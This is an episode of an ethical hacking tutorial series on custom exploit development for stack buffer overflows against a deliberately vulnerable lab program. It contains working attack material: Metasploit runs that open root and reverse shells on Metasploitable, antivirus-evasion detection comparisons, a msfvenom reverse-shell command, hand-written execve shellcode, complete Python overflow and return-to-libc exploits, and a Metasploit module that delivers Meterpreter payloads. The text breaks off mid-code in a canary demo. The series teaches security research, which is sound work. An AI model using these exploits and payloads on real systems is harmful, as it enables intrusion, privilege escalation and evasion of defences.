Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own

What will I learn

Why custom exploits matter -- when off-the-shelf modules fail and you need to write your own;
Memory corruption fundamentals -- the stack, heap, registers, and what happens when software crashes;
Buffer overflows -- smashing the stack to control the instruction pointer;
Shellcode -- writing position-independent code that spawns shells;
Return-to-libc -- calling system functions without injecting code;
Writing a Metasploit module -- turning a PoC into a reusable exploit;
Debugging workflow -- using GDB and x64dbg to analyze crashes and develop exploits;
Defense: ASLR, DEP/NX, stack canaries, and why modern software is harder to exploit.

Requirements

A working modern computer running macOS, Windows or Ubuntu;
GDB (Linux) or x64dbg (Windows) installed;
Basic understanding of C and assembly language;
The ambition to learn ethical hacking and security research.

Difficulty

Advanced

Solutions to Episode 41 Exercises

Exercise 1: Metasploitable exploitation.

# Exploit 1: vsftpd 2.3.4 backdoor
msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> set RHOSTS 192.168.1.100
msf6> exploit
# [*] 192.168.1.100:21 - Banner: 220 (vsFTPd 2.3.4)
# [*] 192.168.1.100:21 - USER: 331 Please specify the password.
# [+] 192.168.1.100:21 - Backdoor service has been spawned
# [+] 192.168.1.100:21 - UID: uid=0(root) gid=0(root)
# Shell as root -- the vsftpd 2.3.4 backdoor opens port 6200 when
# you send a username ending in :) -- Metasploit automates this

# Exploit 2: Samba usermap_script (CVE-2007-2447)
msf6> use exploit/multi/samba/usermap_script
msf6> set RHOSTS 192.168.1.100
msf6> set payload cmd/unix/reverse
msf6> set LHOST 10.10.14.5
msf6> exploit
# [*] Command shell session 2 opened
# Shell as root -- Samba allows backtick command injection in
# the username field when the non-default "username map script"
# option is enabled

# Exploit 3: Tomcat manager upload
msf6> use exploit/multi/http/tomcat_mgr_upload
msf6> set RHOSTS 192.168.1.100
msf6> set HttpUsername tomcat
msf6> set HttpPassword tomcat
msf6> set payload java/meterpreter/reverse_tcp
msf6> set LHOST 10.10.14.5
msf6> exploit
# [*] Meterpreter session 3 opened
# Meterpreter as tomcat user -- the module uploads a WAR file
# containing the payload through the Tomcat Manager interface

Three exploits, three different services, three different access levels. The vsftpd backdoor and Samba exploit both gave root immediately -- these are service-level vulnerabilities in daemons running as root. The Tomcat exploit gave a lower-privileged shell (the tomcat user) because Tomcat runs as a service account, not root. In a real engagement, that Tomcat shell would be your foothold for privilege escalation (episodes 31-32) -- enumerate SUID binaries, check for kernel exploits, look for stored credentials. The three exploits demonstrate the full Metasploit workflow we covered: search, select, configure, exploit. The difference between them is which module you load and which payload you pair with it.

Exercise 2: Payload detection rates.

Windows reverse TCP EXE:     38/72 engines detected (53%)
+ shikata_ga_nai x5:         31/72 engines detected (43%)
Python reverse HTTPS:         4/72 engines detected (6%)
PowerShell one-liner:         8/72 engines detected (11%)

Conclusion: EXE payloads are heavily signatured regardless of
encoding. Script-based payloads (Python, PS) evade most AV.
Encoding reduces but does not eliminate detection.

The numbers tell a clear story. The raw Windows EXE is caught by more than half of all AV engines -- Metasploit payloads have been in every AV signature database for years. Encoding with shikata_ga_nai (5 iterations) drops detection by about 10 percentage points, which sounds useful until you realize 31 engines still catch it. The encoding polymorphism changes the binary signature but not the behavioral pattern -- and modern EDR watches behavior, not just static signatures. The Python and PowerShell payloads have dramatically lower detection because most AV engines are still optimized for PE binary scanning, not script analysis. This is exactly why we said in episode 41 that encoding is NOT a reliable evasion technique -- the detection differential between formats matters far more than how many times you run the encoder.

Exercise 3: Metasploit vs Sliver comparison.

                    Metasploit          Sliver
Implant size        ~73KB (staged)      ~11MB (static Go binary)
AV detection        High (well-known)   Low (newer, less signatured)
Post-exploit cmds   200+                ~40 (growing)
Pivoting            route add + portfwd WireGuard tunnel
Learning curve      Moderate            Low (simpler commands)
Community           Massive             Growing

The size difference is the most immediately visible: Metasploit's staged payloads are tiny (the stager downloads the full stage after execution) while Sliver compiles a complete Go binary. That 11MB Sliver implant is harder to deliver via phishing (an 11MB attachment is suspicious) but once on disk, its detection rate is significantly lower because Go binaries look very different from the C/Ruby payloads that AV vendors have been profiling for years. The WireGuard pivoting in Sliver is a legitimate improvement over Metasploit's route-based approach -- it creates an encrypted tunnel that's harder to detect on the network because WireGuard traffic looks like any other WireGuard VPN connection. Metasploit wins on post-exploitation depth (200+ modules vs ~40) and community size, but Sliver's trajectory is clearly upward. For real engagements, the practical choice often comes down to detection: if the target has mature EDR, Sliver's lower detection profile may get you the initial session that Metasploit's well-known signatures would not.

Learn Ethical Hacking (#42) - Custom Exploit Development - Writing Your Own

Episode 41 covered exploitation frameworks -- Metasploit's modular architecture and the search-select-configure-exploit workflow, Meterpreter as the in-memory post-exploitation Swiss Army Knife, payload generation with msfvenom and why encoding does not defeat modern EDR, Cobalt Strike's Malleable C2 profiles and Beacon implants, and open-source alternatives like Sliver and Havoc that are gaining traction in the red team community. You can now use Metasploit to scan, exploit, and post-exploit targets systematically, generate payloads in multiple formats, and understand why professional pentesters use frameworks instead of manual scripts for everything.

For 41 episodes, we've been using tools that other people built. Metasploit modules. Nmap scripts. Burp Suite extensions. SQLMap. Gobuster. These tools are powerful and they're essential to professional penetration testing -- nobody rewrites SQLMap from scratch for every engagement. But there's a fundamental difference between running use exploit/windows/smb/ms17_010_eternalblue and understanding WHY that exploit works at the memory level. Between pressing a button and understanding what happens when the button is pressed.

This episode is where we cross that line. We're going to look at how software actually breaks -- not at the application layer (SQL injection, XSS, SSRF -- we covered those in episodes 12-28) but at the binary level. How memory is organized. What happens when a program writes more data than a buffer can hold. How you can overwrite a return address to make the CPU jump wherever you want. How you write the machine code that executes after you've hijacked control flow. And how you package all of that into a reusable Metasploit module so your team doesn't have to reinvent it.

This is the hardest material in the series so far. I've marked the difficulty as Advanced for a reason. If you're comfortable with C programming and have a basic understanding of how a CPU executes instructions, you'll be fine. If not, I'd recommend getting comfortable with C first -- the concepts we're covering here are foundational to binary exploitation, and trying to learn both C and exploit development simultaneously is a recipe for frustration.

Here we go.

When Frameworks Are Not Enough

Metasploit has 2,200+ exploits. But the target you're testing might have a vulnerability that is NOT in Metasploit. A custom application built in-house. A proprietary protocol that only this one company uses. A zero-day in commercial software that nobody has published a module for yet. In these cases, you need to write your own exploit.

This is where the real skill lives. Running use exploit/... and pressing enter is point-and-click hacking. Writing your own exploit requires understanding how software breaks at the lowest level -- memory layout, CPU registers, instruction pointers, and the boundary between code and data. It's the difference between driving a car and understanding how the engine works. Both are useful. But when the engine does something unexpected, only one of those skill sets lets you figure out why.

The vulnerability class we're focusing on today is memory corruption -- specifically buffer overflows. These are the oldest and most fundamental class of binary exploitation. The first major buffer overflow exploit was the Morris Worm in 1988 (it exploited a buffer overflow in fingerd). Nearly four decades later, buffer overflows are still being discovered and exploited in production software. CVE-2024-21762 (an out-of-bounds write in Fortinet FortiOS) and CVE-2023-4863 (a heap buffer overflow in libwebp, affecting Chrome and every app that renders WebP images) are both memory corruption bugs, discovered in 2023-2024, in software used by millions.

The Stack -- Where Everything Happens

To understand buffer overflows, you need to understand the call stack. Every time a function is called, the CPU creates a stack frame -- a block of memory that stores the function's local variables, its arguments, and critically, the return address that tells the CPU where to go when the function finishes:

High Memory
+------------------+
| Function args    |  <- pushed by caller
+------------------+
| Return address   |  <- where to go after function returns (CRITICAL)
+------------------+
| Saved EBP        |  <- previous frame pointer
+------------------+
| Local variables  |  <- buffers, integers, pointers
+------------------+
| ...              |
Low Memory (stack grows DOWN)

The return address is the key to everything. When a function finishes executing (hits a ret instruction), the CPU pops this address off the stack and jumps to it. Under normal operation, the return address points back to the calling function -- execution continues where it left off. But if you can overwrite the return address with an address you control, the CPU will jump wherever you tell it to. You control the instruction pointer. You control execution.

The stack grows downward (from high memory addresses to low) but data in buffers is written upward (from low addresses to high). This means that if a buffer overflows, the excess data writes INTO the saved frame pointer and the return address. This is not a coincidence -- it's a fundamental architectural property of how x86 (and most other architectures) manage function calls, and it's exactly what makes stack-based buffer overflows possible.
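To make that overwrite concrete, here is a minimal Python simulation of a single stack frame. It is a sketch, not real process memory: the frame is just a bytearray laid out from low to high addresses, the saved EBP and return address values are made up, and the layout assumes no compiler padding between the buffer and the saved frame pointer (real binaries often have some).

```python
import struct

BUF_SIZE = 64            # models: char buffer[64]
SAVED_EBP = 0xbffff6c8   # hypothetical saved frame pointer
RET_ADDR = 0x080491f6    # hypothetical return address into the caller


def make_frame():
    """Lay out buffer | saved EBP | return address, low address first."""
    return bytearray(BUF_SIZE) + struct.pack('<II', SAVED_EBP, RET_ADDR)


def unchecked_copy(frame, data):
    """Copy data to the start of the frame with no bounds check."""
    frame[0:len(data)] = data
    return frame


def read_frame(frame):
    """Return (saved_ebp, return_address) as the CPU would see them."""
    return struct.unpack_from('<II', frame, BUF_SIZE)


# A short input stays inside the buffer: control data is untouched
ok = unchecked_copy(make_frame(), b'Hello')
print([hex(v) for v in read_frame(ok)])

# 64 bytes fill the buffer; the next 8 land on saved EBP and the return address
smashed = unchecked_copy(make_frame(), b'A' * 64 + b'BBBB' + b'CCCC')
print([hex(v) for v in read_frame(smashed)])
```

The second call leaves 0x42424242 in the saved frame pointer slot and 0x43434343 in the return address slot, purely because the copy kept writing toward higher addresses.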

Buffer Overflow -- The Classic

A buffer overflow occurs when a program writes more data into a buffer than it was allocated to hold. The excess data overwrites adjacent memory on the stack -- including, if you write enough, the return address:

// vulnerable.c -- a deliberately vulnerable program
#include <stdio.h>
#include <string.h>

void vulnerable_function(char *input) {
    char buffer[64];        // 64 bytes allocated on the stack
    strcpy(buffer, input);  // NO bounds checking -- copies ALL of input
    printf("You said: %s\n", buffer);
}

int main(int argc, char *argv[]) {
    if (argc > 1)
        vulnerable_function(argv[1]);
    return 0;
}

The vulnerability is strcpy. It copies bytes from input into buffer until it encounters a null terminator (\0) in the source string. It has absolutely no concept of how large the destination buffer is. If input is 200 bytes and buffer is 64 bytes, strcpy cheerfully writes all 200 bytes, overwriting everything past the end of buffer -- the saved frame pointer, the return address, and whatever else is on the stack above it.

# Compile without protections (for learning purposes)
gcc -o vuln vulnerable.c -fno-stack-protector -z execstack -no-pie -m32

# -fno-stack-protector: disable stack canaries
# -z execstack: make the stack executable (disable NX/DEP)
# -no-pie: disable position-independent executable (fixed addresses)
# -m32: compile as 32-bit (simpler for learning)

# Normal input -- works fine
./vuln "Hello"
# Output: You said: Hello

# Overflow the buffer
./vuln $(python3 -c "print('A' * 100)")
# Segmentation fault (core dumped)
# The return address was overwritten with 0x41414141 (AAAA)

That segfault is not just a crash -- it's proof of control. The CPU tried to jump to address 0x41414141 (the hex representation of "AAAA") because we overwrote the return address with our A characters. The address 0x41414141 doesn't map to any valid memory, so the OS kills the process. But if we replace those As with an address that DOES point to valid memory -- specifically, memory containing code we want to execute -- we have arbitrary code execution.

Finding the Offset

To control the return address precisely, you need to know exactly how many bytes of padding sit between the start of the buffer and the return address on the stack. This isn't just 64 (the buffer size) -- the compiler may add padding bytes between the buffer and the saved frame pointer, and the saved frame pointer itself is 4 bytes (on 32-bit) before the return address.

Metasploit's pattern tools solve this elegantly:

# Generate a unique non-repeating pattern
msf-pattern_create -l 200
# Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2...

# Run the program with this pattern
./vuln "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1..."
# Crash: EIP = 0x63413563

# Find exactly where in the pattern that value appears
msf-pattern_offset -l 200 -q 63413563
# [*] Exact match at offset 76

# Verify: 76 bytes of padding + 4 bytes we control
./vuln $(python3 -c "print('A'*76 + 'BBBB')")
# EIP = 0x42424242 (BBBB) -- we control the instruction pointer!

The pattern works because every 4-byte sequence in it is unique. When the program crashes and the CPU tries to jump to whatever 4 bytes overwrote the return address, those 4 bytes map to exactly one position in the pattern. At offset 76, we can place any 4-byte address we want, and the CPU will jump there. Now we need somewhere useful to jump to.
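If you want to see how the pattern trick works under the hood, the following is a small Python sketch of the same idea. The function names pattern_create and pattern_offset are my own, and it only reproduces the familiar upper/lower/digit triplet format; it is not Metasploit's implementation.

```python
import struct
from string import ascii_lowercase, ascii_uppercase, digits


def pattern_create(length):
    """Build the Aa0Aa1Aa2... cyclic pattern, truncated to length characters."""
    out = []
    for upper in ascii_uppercase:
        for lower in ascii_lowercase:
            for digit in digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return ''.join(out)[:length]
    return ''.join(out)[:length]


def pattern_offset(eip, length):
    """Find where the 4 bytes that ended up in EIP sit inside the pattern."""
    # EIP is little-endian, so unpack it back into the original byte order
    needle = struct.pack('<I', eip).decode('latin-1')
    return pattern_create(length).find(needle)


print(pattern_create(20))
print(pattern_create(200)[76:80])          # the 4 bytes that sit at offset 76
print(pattern_offset(0x63413563, 200))     # the same bytes, read as a little-endian EIP
```

The lookup is just a substring search: the register value is converted back to the four characters in memory order, and their position in the pattern is the offset.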

The Debugging Workflow

Before I show you the exploit, a word on debugging -- because in practice, exploit development is 90% debugging and 10% writing the actual exploit. GDB (GNU Debugger) on Linux and x64dbg on Windows are your primary tools:

# Start GDB with our vulnerable program
gdb ./vuln

# Set a breakpoint at the vulnerable function
(gdb) break vulnerable_function
(gdb) run $(python3 -c "print('A'*76 + 'BBBB')")

# Examine the stack when we hit the breakpoint
(gdb) x/20x $esp
# Shows 20 hex words from the current stack pointer
# The breakpoint fires before strcpy runs, so the buffer is still
# untouched here; after strcpy you will see your A's (0x41414141)
# filling the buffer and BBBB (0x42424242) at the return address

# Step through to the ret instruction
(gdb) disas vulnerable_function
(gdb) break *0x08049xxx   # address of the ret instruction
(gdb) continue

# At the ret instruction, examine what's about to be popped
(gdb) x/1x $esp
# 0xbffff5xx: 0x42424242  -- this is where the CPU will jump

# Examine memory for where to put shellcode
(gdb) x/50x $esp
# Look for your NOP sled or shellcode in the output

# PEDA or GEF make this much easier
# Install: https://github.com/longld/peda
# Adds commands like: checksec, pattern create, ropgadget

# GDB with PEDA (enhanced exploit development)
gdb -q ./vuln
gdb-peda$ checksec
# CANARY    : disabled
# FORTIFY   : disabled
# NX        : disabled     (stack is executable!)
# PIE       : disabled     (fixed addresses)
# RELRO     : Partial

gdb-peda$ pattern create 200
gdb-peda$ run 'Aa0Aa1Aa2...'
gdb-peda$ pattern offset $eip
# EIP+0 found at offset: 76

The checksec command is the first thing you should run against any binary you're analyzing. It tells you exactly which protections are enabled -- and therefore which exploitation techniques are viable. No canary means a straightforward stack overflow works. NX disabled means you can execute code on the stack. No PIE means addresses are fixed and predictable. In real-world targets, some or all of these protections will be enabled, and bypassing them requires more advanced techniques (which we'll cover in the next episode).
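Two of those checks come straight out of the ELF headers, and a rough Python sketch shows where. This is a simplification under stated assumptions: it handles little-endian ELF files only, treats any ET_DYN file as PIE (real tools apply extra checks, since shared libraries are ET_DYN too), and treats a missing PT_GNU_STACK header as an executable stack. The function name elf_protections is hypothetical.

```python
import struct

PT_GNU_STACK = 0x6474e551   # program header describing stack permissions
PF_X = 0x1                  # "executable" permission bit
ET_DYN = 3                  # ELF type used by PIE executables and shared objects


def elf_protections(data):
    """Report PIE and NX for an ELF image passed in as bytes."""
    if data[:4] != b'\x7fELF' or data[5] != 1:
        raise ValueError('not a little-endian ELF file')
    is64 = data[4] == 2
    e_type = struct.unpack_from('<H', data, 16)[0]
    if is64:
        e_phoff = struct.unpack_from('<Q', data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from('<HH', data, 54)
    else:
        e_phoff = struct.unpack_from('<I', data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from('<HH', data, 42)

    nx = False  # assumption: no PT_GNU_STACK header means an executable stack
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        if struct.unpack_from('<I', data, base)[0] == PT_GNU_STACK:
            # p_flags sits at offset 4 in a 64-bit header, 24 in a 32-bit one
            p_flags = struct.unpack_from('<I', data, base + (4 if is64 else 24))[0]
            nx = not (p_flags & PF_X)
    return {'pie': e_type == ET_DYN, 'nx': nx}
```

Usage would look like elf_protections(open('./vuln', 'rb').read()). For the lab binary built with -z execstack -no-pie, I would expect both values to come back False.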

Shellcode -- The Payload

Shellcode is the machine code that executes after you hijack control flow. It's called "shellcode" because traditionally its purpose is to spawn a shell (/bin/sh), giving the attacker interactive command execution. The simplest Linux x86 shellcode uses the execve syscall to run /bin/sh:

; Linux x86 execve("/bin/sh") shellcode
; 25 bytes, no null bytes

xor    eax, eax      ; clear eax (avoid null bytes from mov eax, 0)
push   eax           ; push null terminator onto stack
push   0x68732f2f    ; push "//sh" (extra / is harmless, avoids null)
push   0x6e69622f    ; push "/bin"
mov    ebx, esp      ; ebx = pointer to "/bin//sh\0"
push   eax           ; push NULL (terminates the argv array)
push   ebx           ; push pointer to string (argv[0])
mov    ecx, esp      ; ecx = argv array
xor    edx, edx      ; edx = envp = NULL
mov    al, 0xb       ; syscall number 11 = execve
int    0x80          ; trigger interrupt -> kernel executes syscall

A few things to notice about this shellcode. First, it uses xor eax, eax instead of mov eax, 0 to clear the register -- because mov eax, 0 encodes as B8 00 00 00 00, which contains null bytes. Null bytes (\x00) terminate C strings, so if our shellcode contains a null byte, strcpy will stop copying at that point and the shellcode will be truncated. Every instruction in the shellcode must be null-free. Second, it pushes //sh instead of /sh: /sh is only three bytes, so a 4-byte push would need a null byte as padding, while //sh fills all four bytes (the extra / is harmless -- the kernel resolves /bin//sh to the same file as /bin/sh). These constraints are what make shellcode writing its own art -- you're writing machine code under tight constraints on which byte values you can use.
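Checking for bad characters by eye gets old fast, so here is a small Python helper as a sketch. The find_bad_chars name is my own; the shellcode bytes are the hand-assembled execve listing above, grouped one instruction per hex string.

```python
# One hex group per instruction from the listing above
SHELLCODE = bytes.fromhex(
    '31c0'          # xor eax, eax
    '50'            # push eax
    '682f2f7368'    # push 0x68732f2f  ("//sh")
    '682f62696e'    # push 0x6e69622f  ("/bin")
    '89e3'          # mov ebx, esp
    '50'            # push eax
    '53'            # push ebx
    '89e1'          # mov ecx, esp
    '31d2'          # xor edx, edx
    'b00b'          # mov al, 0xb
    'cd80'          # int 0x80
)


def find_bad_chars(code, bad=b'\x00'):
    """Return (offset, byte) pairs for every forbidden byte found in code."""
    return [(i, b) for i, b in enumerate(code) if b in bad]


print(len(SHELLCODE), find_bad_chars(SHELLCODE))

# For comparison: mov eax, 0 encodes as B8 00 00 00 00
print(find_bad_chars(bytes.fromhex('b800000000')))
```

The bad parameter can carry more than the null byte. Targets that read input line by line, for example, usually also choke on \x0a and \x0d, so you would pass bad=b'\x00\x0a\x0d'.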

# Generate shellcode with msfvenom (instead of hand-writing it)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 \
    -f python -b '\x00'
# -p: payload (reverse TCP shell)
# -f python: output as Python byte string
# -b '\x00': avoid null bytes (bad characters)

# Output:
# buf =  b""
# buf += b"\xbd\x12\x34\x56\x78\xd9\xc1..."
# 95 bytes of encoded reverse shell shellcode

Now let's assemble the complete exploit:

#!/usr/bin/env python3
"""exploit.py -- buffer overflow exploit for vulnerable.c"""
import struct
import subprocess

# Offset to return address (found with pattern_offset)
offset = 76

# Stack address to return to (found with GDB)
# This points somewhere in our NOP sled
ret_addr = struct.pack('<I', 0xbffff5a0)

# NOP sled -- a landing zone of no-operation instructions
# We don't need to hit the exact start of our shellcode
# Anywhere in the NOP sled slides execution down to it
nop_sled = b'\x90' * 200

# Shellcode: Linux x86 execve /bin/sh (25 bytes)
shellcode  = b'\x31\xc0\x50\x68\x2f\x2f\x73\x68'
shellcode += b'\x68\x2f\x62\x69\x6e\x89\xe3\x50'
shellcode += b'\x53\x89\xe1\x31\xd2\xb0\x0b\xcd'
shellcode += b'\x80'

# Build the payload
payload = b'A' * offset         # padding to reach return address
payload += ret_addr             # overwrite return address
payload += nop_sled             # landing zone
payload += shellcode            # the actual payload

# Execute
subprocess.run(['./vuln', payload])

The NOP sled (a long sequence of \x90 no-operation instructions) is important for reliability. We calculated the buffer's address with GDB, but that address might shift slightly due to environment variables, command-line argument length, or other factors. The NOP sled gives us a 200-byte landing zone -- the CPU just needs to hit anywhere in those 200 NOPs and it will slide forward into the shellcode. Without the NOP sled, we'd need to hit the exact first byte of our shellcode, which is fragile.
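A quick way to reason about how much slack the sled buys you is to compute the address range it covers. The sketch below does that in Python. The buffer start addresses are hypothetical values chosen for illustration (in practice you read the real one from GDB), and the helper names are my own.

```python
import struct


def build_payload(offset, ret, sled_len, shellcode):
    """padding | return address | NOP sled | shellcode"""
    return b'A' * offset + struct.pack('<I', ret) + b'\x90' * sled_len + shellcode


def sled_range(buffer_start, offset, sled_len):
    """First sled address and the address of the first shellcode byte."""
    sled_start = buffer_start + offset + 4   # sled begins right after the 4-byte return address
    return sled_start, sled_start + sled_len


def lands_in_sled(ret, buffer_start, offset, sled_len):
    """True if jumping to ret hits a NOP or the first byte of the shellcode."""
    start, end = sled_range(buffer_start, offset, sled_len)
    return start <= ret <= end


RET = 0xbffff5a0
for guess in (0xbffff500, 0xbffff4a0, 0xbffff400):   # hypothetical buffer addresses
    start, end = sled_range(guess, 76, 200)
    print(hex(guess), hex(start), hex(end), lands_in_sled(RET, guess, 76, 200))
```

With a 200-byte sled, the buffer can move by up to 200 bytes in either direction across runs before a fixed return address misses. That is the reliability margin you are paying for with those extra bytes.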

Return-to-libc -- When the Stack Is Not Executable

Modern systems mark the stack as non-executable using NX (No-Execute) or DEP (Data Execution Prevention). Your shellcode is sitting on the stack, but the CPU refuses to execute it -- the memory page is marked as "data, not code" and the CPU raises a hardware exception if you try to execute from it.

The solution: don't inject code at all. Instead, reuse code that already exists in memory. Nearly every dynamically linked program loads libc (the C standard library), and libc contains system(), which executes shell commands. If you overwrite the return address with the address of system() and set up the stack correctly so that "/bin/sh" is its argument, you get a shell without any injected shellcode:

# Find the addresses we need (with ASLR disabled for learning)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

# Find libc's base address
ldd vuln
# libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xf7c00000)

# Find system() offset within libc
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " system"
# 0x00048150 system
# Absolute address: 0xf7c00000 + 0x00048150 = 0xf7c48150

# Find the "/bin/sh" string within libc (it's there -- libc uses it!)
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
# 0x001bd0f5 /bin/sh
# Absolute address: 0xf7c00000 + 0x001bd0f5 = 0xf7dbd0f5

#!/usr/bin/env python3
"""ret2libc.py -- return-to-libc exploit (bypasses NX/DEP)"""
import struct
import subprocess

offset = 76

# Build a fake stack frame that calls system("/bin/sh")
# After overwriting the return address, the stack looks like:
#
# +------------------+
# | system() address |  <- CPU jumps here (our return address)
# +------------------+
# | fake return addr |  <- where system() "returns" to (don't care)
# +------------------+
# | "/bin/sh" addr   |  <- first argument to system()
# +------------------+

system_addr = struct.pack('<I', 0xf7c48150)  # address of system()
fake_return = b'BBBB'                         # we don't care where
                                              # system() returns
binsh_addr  = struct.pack('<I', 0xf7dbd0f5)  # address of "/bin/sh"

payload = b'A' * offset       # padding
payload += system_addr         # overwrite return address -> system()
payload += fake_return         # system()'s return address
payload += binsh_addr          # system()'s first argument

subprocess.run(['./vuln', payload])
# Shell! -- no code injection, NX bypass achieved

The elegance of return-to-libc is that you're not injecting any new code. You're calling a function that already exists in the process's address space with arguments that already exist in the process's address space. The "/bin/sh" string is inside libc because libc itself uses it internally. You're just... arranging the stack so that existing code does what you want. The defense that blocks code injection (NX) is completely irrelevant because you're not injecting code -- you're reusing what's already there.
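The address arithmetic is easy to get wrong by hand, so it is worth scripting. Below is a minimal sketch that derives the absolute addresses from the libc base and offsets used in this episode and refuses to build a chain containing a null byte (which strcpy would truncate). The build_chain helper is hypothetical, and the base and offsets are specific to my lab libc; yours will differ.

```python
import struct

LIBC_BASE = 0xf7c00000       # from ldd, with ASLR disabled
SYSTEM_OFFSET = 0x00048150   # from readelf -s
BINSH_OFFSET = 0x001bd0f5    # from strings -a -t x


def build_chain(libc_base, system_off, binsh_off, fake_ret=b'BBBB'):
    """Return system() address | fake return address | "/bin/sh" address."""
    system_addr = libc_base + system_off
    binsh_addr = libc_base + binsh_off
    chain = struct.pack('<I', system_addr) + fake_ret + struct.pack('<I', binsh_addr)
    if b'\x00' in chain:
        raise ValueError('chain contains a null byte; strcpy would truncate it')
    return chain


chain = build_chain(LIBC_BASE, SYSTEM_OFFSET, BINSH_OFFSET)
print(chain.hex())
```

The null-byte check matters more than it looks: if system() happens to sit at an address ending in 00 on your libc build, this exact chain cannot be delivered through strcpy and you need a different target function or gadget.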

This concept -- reusing existing code fragments instead of injecting new code -- is the foundation of Return-Oriented Programming (ROP), which chains together small sequences of existing instructions (called gadgets) to perform arbitrary computation. ROP is how modern exploits bypass NX/DEP even when system() isn't conveniently available. We'll cover ROP chains in detail in the next episode.

Writing a Metasploit Module

Once you have a working exploit, the professional move is to package it as a Metasploit module so your team can reuse it. This turns your one-off proof-of-concept into a tool that anyone on the team can use with the standard search-select-configure-exploit workflow:

# modules/exploits/linux/misc/custom_bof.rb
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Custom Buffer Overflow - VulnService',
      'Description' => 'Stack buffer overflow in vulnerable_service v1.0.
                        The service reads user input into a 64-byte stack
                        buffer using strcpy without bounds checking.',
      'Author'      => ['scipio'],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_X86,
      'Targets'     => [
        ['Ubuntu 22.04 (libc 2.35)', { 'Ret' => 0xbffff5a0 }],
        ['Debian 12 (libc 2.36)',    { 'Ret' => 0xbffff590 }]
      ],
      'Payload'       => { 'BadChars' => "\x00" },  # strcpy stops at a null byte
      'DefaultTarget' => 0,
      'Privileged'    => true
    ))
    register_options([
      Opt::RPORT(9999)
    ])
  end

  def exploit
    connect

    buf = rand_text(76)                    # random padding (offset 76)
    buf << [target.ret].pack('V')          # return address for this target
    buf << make_nops(200)                  # NOP sled
    buf << payload.encoded                 # Metasploit payload (selected
                                           # by the user: reverse_tcp,
                                           # meterpreter, whatever)

    print_status("Sending #{buf.length} byte exploit buffer...")
    sock.put(buf)
    handler                                # handle the incoming session
    disconnect
  end
end

# Use the custom module
msf6> use exploit/linux/misc/custom_bof
msf6> set RHOSTS 192.168.1.100
msf6> set LHOST 10.10.14.5
msf6> set payload linux/x86/meterpreter/reverse_tcp
msf6> show targets
# 0  Ubuntu 22.04 (libc 2.35)
# 1  Debian 12 (libc 2.36)
msf6> set target 0
msf6> exploit
# [*] Sending 305 byte exploit buffer...
# [*] Meterpreter session 1 opened

The module structure is important. The Targets array allows you to support multiple versions of the target software -- different OS versions might have the return address at a slightly different offset or at a different stack address. rand_text(76) generates random padding instead of repeating As, which avoids triggering IDS rules that look for long strings of identical bytes (a common indicator of buffer overflow attempts). And payload.encoded uses whatever payload the user selected, with whatever encoding they configured -- the module doesn't need to care about the specific shellcode because Metasploit handles that separation.
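If you are still working from the standalone Python PoC, you can get the same effect as random padding with a few lines. This is a rough analogue written for illustration, not Metasploit's code; the random_padding name and the seed parameter are my own.

```python
import random


def random_padding(length, bad_chars=b'\x00', seed=None):
    """Return length random bytes, none of which appear in bad_chars."""
    allowed = bytes(b for b in range(256) if b not in bad_chars)
    if not allowed:
        raise ValueError('every byte value is excluded')
    rng = random.Random(seed)   # pass a seed only when you need reproducible output
    return bytes(rng.choice(allowed) for _ in range(length))


padding = random_padding(76, bad_chars=b'\x00\x0a\x0d')
print(len(padding), padding.hex())
```

Excluding the bad characters matters just as much for padding as for shellcode: a stray null byte in the first 76 bytes would stop strcpy before it ever reaches the return address.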

Modern Mitigations -- The Defense Stack

The exploits above work against programs compiled without protections. Modern software has multiple defense layers, and each one makes exploitation significantly harder:

ASLR (Address Space Layout Randomization)
  What it does: randomizes the base addresses of the stack, heap,
  libraries, and (with PIE) the executable itself at every run
  Impact: the addresses we hardcoded (0xbffff5a0, 0xf7c48150)
  change every time the program starts
  Bypass: information leak -- find a way to read a memory address
  from the running process, calculate the base, derive all other
  addresses from the known offsets

DEP/NX (Data Execution Prevention / No-Execute)
  What it does: marks stack and heap memory as non-executable
  Impact: shellcode on the stack can't execute
  Bypass: return-to-libc (as shown above), ROP chains

Stack Canaries (Stack Smashing Protection)
  What it does: compiler places a random value (the "canary")
  between local variables and the return address. Before the
  function returns, it checks if the canary was modified.
  If modified -> the overflow is detected -> program aborts
  Impact: you can't blindly overwrite past the canary without
  the program detecting the corruption
  Bypass: information leak to read the canary value, then include
  the correct canary in your overflow payload

PIE (Position Independent Executable)
  What it does: compiles the executable so that ASLR can also
  randomize its own load address (without PIE, ASLR randomizes
  the stack, heap, and libraries but not the executable)
  Impact: you can't use addresses within the executable for
  gadgets or return addresses
  Bypass: information leak + ROP (need a leak first)

RELRO (Relocation Read-Only)
  Full RELRO: GOT (Global Offset Table) is read-only after
  loading -- prevents GOT overwrite attacks
  Partial RELRO: the GOT entries used for lazy binding stay
  writable -- GOT overwrite is still possible

CFI (Control Flow Integrity)
  What it does: checks at runtime that control flow follows the
  call graph the compiler computed at build time. Indirect calls
  and returns are checked against a whitelist of valid targets.
  Impact: even if you control the instruction pointer, you can
  only jump to "valid" destinations per the CFI policy
  Bypass: very difficult. Active research area. CFI is the
  current frontier of exploit mitigation.
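
The stack canary entry above is easier to follow with a toy model. The Python sketch below simulates a frame with a canary between the buffer and the saved registers. Everything here is an assumption made for illustration: the canary value is fixed (real ones are random per process), there is no compiler padding, and the check is a plain comparison standing in for the compiler-inserted epilogue code.

```python
import struct

BUF_SIZE = 64
CANARY = b'\x00\xde\xc0\xad'   # hypothetical value for the demo


def make_frame(ret_addr=0x080491f6):
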